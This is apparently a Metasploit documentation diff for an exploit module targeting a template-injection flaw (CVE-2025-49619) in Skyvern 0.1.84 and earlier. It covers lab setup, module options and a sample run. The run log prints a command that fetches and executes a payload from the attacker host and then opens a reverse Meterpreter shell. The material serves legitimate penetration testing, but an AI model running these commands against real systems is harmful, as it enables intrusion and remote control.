|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +Skyvern is browser-based automation tool integrated with AI and LLMs. |
| 4 | +It allows to create workflows, which can perform automation tasks based on LLMs. |
| 5 | +Version up to 0.1.84 is vulnerable to SSTI, which can lead to remote code execution. |
| 6 | +The application is available [here](https://github.com/Skyvern-AI/skyvern.git). |
| 7 | + |
| 8 | +### Installation |
| 9 | + |
| 10 | +1. `git clone https://github.com/Skyvern-AI/skyvern.git` |
| 11 | +2. `cd skyvern` |
| 12 | +3. `mv .env.example .env` |
| 13 | +4. `mv skyvern-frontend/.env.example skyvern-frontend/.env` |
| 14 | +5. Override the content of `docker-compose.yml` with the following configuration: |
| 15 | +```yaml |
| 16 | +services: |
| 17 | + postgres: |
| 18 | + image: postgres:14-alpine |
| 19 | + restart: always |
| 20 | + # comment out if you want to externally connect DB |
| 21 | + ports: |
| 22 | + - 5432:5432 |
| 23 | + volumes: |
| 24 | + - ./postgres-data:/var/lib/postgresql/data |
| 25 | + environment: |
| 26 | + - PGDATA=/var/lib/postgresql/data/pgdata |
| 27 | + - POSTGRES_USER=skyvern |
| 28 | + - POSTGRES_PASSWORD=skyvern |
| 29 | + - POSTGRES_DB=skyvern |
| 30 | + healthcheck: |
| 31 | + test: ["CMD-SHELL", "pg_isready -U skyvern"] |
| 32 | + interval: 5s |
| 33 | + timeout: 5s |
| 34 | + retries: 5 |
| 35 | + skyvern: |
| 36 | + image: public.ecr.aws/skyvern/skyvern:v0.1.84 |
| 37 | + restart: on-failure |
| 38 | + env_file: |
| 39 | + - .env |
| 40 | + # comment out if you want to externally call skyvern API |
| 41 | + ports: |
| 42 | + - 8000:8000 |
| 43 | + - 9222:9222 # for cdp browser forwarding |
| 44 | + volumes: |
| 45 | + - ./artifacts:/data/artifacts |
| 46 | + - ./videos:/data/videos |
| 47 | + - ./har:/data/har |
| 48 | + - ./log:/data/log |
| 49 | + - ./.streamlit:/app/.streamlit |
| 50 | + # Uncomment the following two lines if you want to connect to any local changes |
| 51 | + # - ./skyvern:/app/skyvern |
| 52 | + # - ./alembic:/app/alembic |
| 53 | + environment: |
| 54 | + - DATABASE_STRING=postgresql+psycopg://skyvern:skyvern@postgres:5432/skyvern |
| 55 | + - BROWSER_TYPE=chromium-headful |
| 56 | + - ENABLE_CODE_BLOCK=true |
| 57 | + # - BROWSER_TYPE=cdp-connect |
| 58 | + # Use this command to start Chrome with remote debugging: |
| 59 | + # "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\chrome-cdp-profile" --no-first-run --no-default-browser-check |
| 60 | + # /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --user-data-dir="/Users/yourusername/chrome-cdp-profile" --no-first-run --no-default-browser-check |
| 61 | + # - BROWSER_REMOTE_DEBUGGING_URL=http://host.docker.internal:9222/ |
| 62 | + # ========================= |
| 63 | + # LLM Settings - Recommended to use skyvern CLI, `skyvern init llm` to setup your LLM's |
| 64 | + # ========================= |
| 65 | + # OpenAI Support: |
| 66 | + # If you want to use OpenAI as your LLM provider, uncomment the following lines and fill in your OpenAI API key. |
| 67 | + # - ENABLE_OPENAI=true |
| 68 | + # - LLM_KEY=OPENAI_GPT4O |
| 69 | + # - OPENAI_API_KEY=<your_openai_key> |
| 70 | + # Gemini Support: |
| 71 | + # Gemini is a new LLM provider that is currently in beta. You can use it by uncommenting the following lines and filling in your Gemini API key. |
| 72 | + # - LLM_KEY=GEMINI |
| 73 | + # - ENABLE_GEMINI=true |
| 74 | + # - GEMINI_API_KEY=YOUR_GEMINI_KEY |
| 75 | + # - LLM_KEY=GEMINI_2.5_PRO_PREVIEW_03_25 |
| 76 | + # If you want to use other LLM provider, like azure and anthropic: |
| 77 | + # - ENABLE_ANTHROPIC=true |
| 78 | + # - LLM_KEY=ANTHROPIC_CLAUDE3.5_SONNET |
| 79 | + # - ANTHROPIC_API_KEY=<your_anthropic_key> |
| 80 | + # Microsoft Azure OpenAI support: |
| 81 | + # If you'd like to use Microsoft Azure OpenAI as your managed LLM service integration with Skyvern, use the environment variables below. |
| 82 | + # In your Microsoft Azure subscription, you will need to provision the OpenAI service and deploy a model, in order to utilize it. |
| 83 | + # 1. Login to the Azure Portal |
| 84 | + # 2. Create an Azure Resource Group |
| 85 | + # 3. Create an OpenAI resource in the Resource Group (choose a region and pricing tier) |
| 86 | + # 4. From the OpenAI resource's Overview page, open the "Azure AI Foundry" portal (click the "Explore Azure AI Foundry Portal" button) |
| 87 | + # 5. In Azure AI Foundry, click "Shared Resources" --> "Deployments" |
| 88 | + # 6. Click "Deploy Model" --> "Deploy Base Model" --> select a model (specify this model "Deployment Name" value for the AZURE_DEPLOYMENT variable below) |
| 89 | + # - ENABLE_AZURE=true |
| 90 | + # - LLM_KEY=AZURE_OPENAI # Leave this value static, don't change it |
| 91 | + # - AZURE_DEPLOYMENT=<your_azure_deployment> # Use the OpenAI model "Deployment Name" that you deployed, using the steps above |
| 92 | + # - AZURE_API_KEY=<your_azure_api_key> # Copy and paste Key1 or Key2 from the OpenAI resource in Azure Portal |
| 93 | + # - AZURE_API_BASE=<your_azure_api_base> # Copy and paste the "Endpoint" from the OpenAI resource in Azure Portal (eg. https://xyzxyzxyz.openai.azure.com/) |
| 94 | + # - AZURE_API_VERSION=<your_azure_api_version> # Specify a valid Azure OpenAI data-plane API version (eg. 2024-08-01-preview) Docs: https://learn.microsoft.com/en-us/azure/ai-services/openai/reference |
| 95 | + # Amazon Bedrock Support: |
| 96 | + # Amazon Bedrock is a managed service that enables you to invoke LLMs and bill them through your AWS account. |
| 97 | + # To use Amazon Bedrock as the LLM provider for Skyvern, specify the following environment variables. |
| 98 | + # 1. In the AWS IAM console, create a new AWS IAM User (name it whatever you want) |
| 99 | + # 2. Assign the "AmazonBedrockFullAccess" policy to the user |
| 100 | + # 3. Generate an IAM Access Key under the IAM User's Security Credentials tab |
| 101 | + # 4. In the Amazon Bedrock console, go to "Model Access" |
| 102 | + # 5. Click Modify Model Access button |
| 103 | + # 6. Enable "Claude 3.5 Sonnet v2" and save changes |
| 104 | + # - ENABLE_BEDROCK=true |
| 105 | + # - LLM_KEY=BEDROCK_ANTHROPIC_CLAUDE3.5_SONNET # This is the Claude 3.5 Sonnet "V2" model. Change to BEDROCK_ANTHROPIC_CLAUDE3.5_SONNET_V1 for the non-v2 version. |
| 106 | + # - AWS_REGION=us-west-2 # Replace this with a different AWS region, if you desire |
| 107 | + # - AWS_ACCESS_KEY_ID=FILL_ME_IN_PLEASE |
| 108 | + # - AWS_SECRET_ACCESS_KEY=FILL_ME_IN_PLEASE |
| 109 | + # Ollama Support: |
| 110 | + # Ollama is a local LLM provider that can be used to run models locally on your machine. |
| 111 | + # - LLM_KEY=OLLAMA |
| 112 | + # - ENABLE_OLLAMA=true |
| 113 | + # - OLLAMA_MODEL=qwen2.5:7b-instruct |
| 114 | + # - OLLAMA_SERVER_URL=http://host.docker.internal:11434 |
| 115 | + # Open Router Support: |
| 116 | + # - ENABLE_OPENROUTER=true |
| 117 | + # - LLM_KEY=OPENROUTER |
| 118 | + # - OPENROUTER_API_KEY=<your_openrouter_api_key> |
| 119 | + # - OPENROUTER_MODEL=mistralai/mistral-small-3.1-24b-instruct |
| 120 | + # Groq Support: |
| 121 | + # - ENABLE_GROQ=true |
| 122 | + # - LLM_KEY=GROQ |
| 123 | + # - GROQ_API_KEY=<your_groq_api_key> |
| 124 | + # - GROQ_MODEL=llama-3.1-8b-instant |
| 125 | + |
| 126 | + # Maximum tokens to use: (only set for OpenRouter aand Ollama) |
| 127 | + # - LLM_CONFIG_MAX_TOKENS=128000 |
| 128 | + |
| 129 | + # Bitwarden Settings |
| 130 | + # If you are looking to integrate Skyvern with a password manager (eg Bitwarden), you can use the following environment variables. |
| 131 | + # - BITWARDEN_SERVER=http://localhost # OPTIONAL IF YOU ARE SELF HOSTING BITWARDEN |
| 132 | + # - BITWARDEN_SERVER_PORT=8002 # OPTIONAL IF YOU ARE SELF HOSTING BITWARDEN |
| 133 | + # - BITWARDEN_CLIENT_ID=FILL_ME_IN_PLEASE |
| 134 | + # - BITWARDEN_CLIENT_SECRET=FILL_ME_IN_PLEASE |
| 135 | + # - BITWARDEN_MASTER_PASSWORD=FILL_ME_IN_PLEASE |
| 136 | + |
| 137 | + # 1Password Integration |
| 138 | + # If you are looking to integrate Skyvern with 1Password, you can use the following environment variables. |
| 139 | + # OP_SERVICE_ACCOUNT_TOKEN="" |
| 140 | + depends_on: |
| 141 | + postgres: |
| 142 | + condition: service_healthy |
| 143 | + healthcheck: |
| 144 | + test: ["CMD", "test", "-f", "/app/.streamlit/secrets.toml"] |
| 145 | + interval: 5s |
| 146 | + timeout: 5s |
| 147 | + retries: 5 |
| 148 | + skyvern-ui: |
| 149 | + image: public.ecr.aws/skyvern/skyvern-ui:latest |
| 150 | + restart: on-failure |
| 151 | + ports: |
| 152 | + - 8080:8080 |
| 153 | + - 9090:9090 |
| 154 | + volumes: |
| 155 | + - ./artifacts:/data/artifacts |
| 156 | + - ./videos:/data/videos |
| 157 | + - ./har:/data/har |
| 158 | + - ./.streamlit:/app/.streamlit |
| 159 | + env_file: |
| 160 | + - skyvern-frontend/.env |
| 161 | + environment: {} |
| 162 | + # - VITE_ENABLE_CODE_BLOCK=true |
| 163 | + # if you want to run skyvern on a remote server, |
| 164 | + # you need to change the host in VITE_WSS_BASE_URL and VITE_API_BASE_URL to match your server ip |
| 165 | + # If you're self-hosting this behind a dns, you'll want to set: |
| 166 | + # A route for the API: api.yourdomain.com -> localhost:8000 |
| 167 | + # A route for the UI: yourdomain.com -> localhost:8080 |
| 168 | + # A route for the artifact API: artifact.yourdomain.com -> localhost:9090 (maybe not needed) |
| 169 | + # - VITE_WSS_BASE_URL=ws://localhost:8000/api/v1 |
| 170 | + # - VITE_ARTIFACT_API_BASE_URL=http://localhost:9090 |
| 171 | + # - VITE_API_BASE_URL=http://localhost:8000/api/v1 |
| 172 | + # - VITE_SKYVERN_API_KEY=<get this from "settings" in the Skyvern UI> |
| 173 | + depends_on: |
| 174 | + skyvern: |
| 175 | + condition: service_healthy |
| 176 | +``` |
| 177 | +6. `docker-compose up` |
| 178 | + |
| 179 | + |
| 180 | +## Verification Steps |
| 181 | + |
| 182 | +1. Install the application |
| 183 | +2. Start msfconsole |
| 184 | +3. Do: `use linux/http/skyvern_ssti_cve_2025_49619` |
| 185 | +4. Set `rhost`,`rport`, `lhost`, `lport` |
| 186 | +5. Do: `set API_KEY [skyvern API key]` |
| 187 | +6. Do: `run` |
| 188 | +7. You should get a shell. |
| 189 | + |
| 190 | +## Options |
| 191 | + |
| 192 | +### API_KEY |
| 193 | + |
| 194 | +The Skyvern uses API key to access API and manage the application. |
| 195 | +It is necessary to view, create and modify workflows. It can be acquired from UI interface. |
| 196 | + |
| 197 | +## Scenarios |
| 198 | + |
| 199 | +Vulnerable version is <=0.1.84. |
| 200 | + |
| 201 | +``` |
| 202 | +msf6 exploit(linux/http/skyvern_ssti_cve_2025_49619) > run verbose=true |
| 203 | +[*] Command to run on remote host: curl -so ./SFDHeJURLqF http://192.168.168.183:8080/YtbemzlkZg8l1wkKWmIdEg;chmod +x ./SFDHeJURLqF;./SFDHeJURLqF& |
| 204 | +[*] Fetch handler listening on 192.168.168.183:8080 |
| 205 | +[*] HTTP server started |
| 206 | +[*] Adding resource /YtbemzlkZg8l1wkKWmIdEg |
| 207 | +[*] Started reverse TCP handler on 192.168.168.183:4444 |
| 208 | +[*] Client 192.168.168.146 requested /YtbemzlkZg8l1wkKWmIdEg |
| 209 | +[*] Sending payload to 192.168.168.146 (curl/7.88.1) |
| 210 | +[*] Transmitting intermediate stager...(126 bytes) |
| 211 | +[*] Sending stage (3045380 bytes) to 192.168.168.146 |
| 212 | +[*] Meterpreter session 1 opened (192.168.168.183:4444 -> 192.168.168.146:48480) at 2025-06-23 10:04:13 +0200 |
| 213 | + |
| 214 | +meterpreter > sysinfo |
| 215 | +Computer : 172.18.0.3 |
| 216 | +OS : Debian 12.10 (Linux 6.8.0-52-generic) |
| 217 | +Architecture : x64 |
| 218 | +BuildTuple : x86_64-linux-musl |
| 219 | +Meterpreter : x64/linux |
| 220 | + |
| 221 | +``` |
0 commit comments